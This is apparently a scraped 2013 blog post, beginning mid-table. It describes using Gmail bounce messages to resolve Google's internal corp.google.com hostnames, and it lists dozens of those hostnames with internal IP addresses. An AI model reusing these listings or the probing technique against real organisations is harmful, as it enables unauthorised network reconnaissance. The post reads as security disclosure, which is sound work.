<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">seal.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.8.84</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">jeans.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.72.81</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bolt.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.98.178</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bow.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.112.36</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sunny.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.27.82.125</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">shark.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.28.149.4</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">buddy.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.115.127</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">peanut.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.102.44</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">rain.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.27.80.52</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">pile.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.133.81</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">twist.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">100.104.42.23</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bull.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.103.54</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sheep.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.27.86.154</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">hurricane.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.84.167</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">robot.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.115.107</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">brain.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.90.153</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">search.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.16.255.28</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cut.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.8.65</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">hero.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.172.24</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">river.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.27.84.63</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ear.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.117.91</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">engage.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.121.235</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">gift.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.31.70.65</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sugar.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.97.53</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">analyst.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.27.196.24</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">jury.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.184.119</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">pocket.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.26.64.54</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">earth.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.27.22.33</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bear.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.64.65</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cash.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.82.80</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">predict.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.115.33</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">brown.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.117.56</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[2620:0:10c0:115b:d6ae:52ff:fe72:375b], [2620:0:10c1:1130:862b:2bff:fe01:bb49], [2620:0:10c1:1130:862b:2bff:fe01:b86a], [2620:0:10c0:1157:7a2b:cbff:fe40:8b45], [2620:0:10c8:111f:7a2b:cbff:fe22:ac0a], [2620:0:10cc:1109:7a2b:cbff:fe1e:a39c], [2620:0:10c0:1155:7a2b:cbff:fe40:9863], [2620:0:10cc:1109:7a2b:cbff:fe1e:b48c], [2620:0:10c1:1130:862b:2bff:fe01:b710], [2620:0:10c8:1120:7a2b:cbff:fe51:4505] 172.25.118.210 172.24.204.11, 172.25.119.213, 172.25.118.69, 172.24.156.19, 172.24.204.12, 172.16.255.204, 172.25.152.139, 172.24.156.20, 172.25.152.208, 172.24.204.10</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">anywhere.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.123.28</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">forth.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.117.154</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">secret.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.113.69</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">shade.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.122.96</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">element.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.116.103</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">spot.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.219.36</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">prompt.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.28.12.24</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sun.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.92.133</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">quit.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">127.0.0.1</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ice.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.90.17</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">silent.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.117.137</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">creative.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.194.41</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">rocket.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">100.104.26.42</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">perfect.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">100.104.7.16</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">lady.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.28.15.15</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">chip.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.114.129</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">green.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[2620:0:1000:3803:a800:1ff:fe00:4e9b], 172.24.98.22</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">iron.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.98.108</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">king.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[::ffff:172.16.255.48], 172.16.255.48</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">visible.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.114.89</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">crack.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.124.73</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">galaxy.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.82.132</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sand.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.109.255</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">knife.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.121.170</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">pole.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.67.53</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">free.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.104.61</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">shell.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">192.168.132.163</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">tomato.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.64.67</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">spot.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.219.36</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">evolution.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.124.99</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">hudson.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.56.49</span></td></tr>
</tbody></table>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2758033932557168278.post-41644020542404694432013-11-22T03:28:00.001-08:002013-12-03T08:14:32.719-08:00Scanning for Google's internal corporate subdomains For some reason Gmail appears to use an internal DNS server. This allows to verify existence and even resolve the IP addresses of Google's internal corporate domain names. For example, if you send an e-mail to test@root.corp.google.com you will receive an error response:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIz6VwF6MBz-oFLO3Mcil87gMUshzJbddFpliHrTeBme9QrDcDv1RSpBmbcjezTIqWrBvXNvXim5F9t3HNGfa_9zhXizlPrxvBaQVrgsOMyHnya8goOaXUTSry38d5E0Mei9Y-NiP2g9g/s1600/Screenshot+from+2013-11-22+13:06:36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIz6VwF6MBz-oFLO3Mcil87gMUshzJbddFpliHrTeBme9QrDcDv1RSpBmbcjezTIqWrBvXNvXim5F9t3HNGfa_9zhXizlPrxvBaQVrgsOMyHnya8goOaXUTSry38d5E0Mei9Y-NiP2g9g/s320/Screenshot+from+2013-11-22+13:06:36.png" width="320" /></a></div>
<br />
So apparently there's a server located at <span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root.corp.google.com</span> and its ip address is<span style="font-family: Courier New, Courier, monospace;"> </span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.16.115.10.</span><br />
Here's a list of some of these domain names (of course it's not comprehensive).<br />
Some companies:<br />
<table>
<tbody>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">yahoo.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.31.9.1</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">oracle.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.116.205</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">microsoft.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.31.9.1</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">myspace.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.121.235</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bebo.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.90.16</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">makani.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.27.145.31</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">splunk.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.117.23</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">netapp.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[::ffff:172.16.255.48], 172.16.255.48</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">tableau.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.100.77</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">fireeye.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.0.7</span></td></tr>
</tbody></table>
<div>
<br />
Google's corporate structure:</div>
<div>
<table>
<tbody>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">marketing.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.77.12</span></td></tr>
</tbody></table>
<br />
And a lot of other words:</div>
<table>
<tbody>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">male.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.208.116</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">offer.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.121.53</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">girl.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.73.34</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">computer.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.26.77.190</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">fail.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.121.235</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">fear.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.80.52</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">death.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.81.204</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ash.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.64.63</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">dust.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.129.187</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">spirit.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.90.106</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">policy.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.184.119</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">nothing.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.122.136</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">gypsy.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.76.135</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">boot.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.84.202</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.16.115.10</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">surveys.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">70.32.156.24</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">license.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.98.14</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">humor.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.115.121</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">peregrine.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.116.84</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">rda.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.90.30</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sierra.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.125.44</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">lattice.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.116.27</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">manhattan.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.135.203</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">research.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.132.245</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">discovery.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.96.46</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">concepts.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.0.202</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">invent.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.81.164</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">effort.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.66.67</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">free.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.104.61</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kick.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.133.156</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">air.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">216.239.44.190</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">never.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.102.87</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">event.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.138.70</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">you.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.132.179</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aqualung.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.118.62</span></td></tr>
</tbody></table>
Unknownnoreply@blogger.com0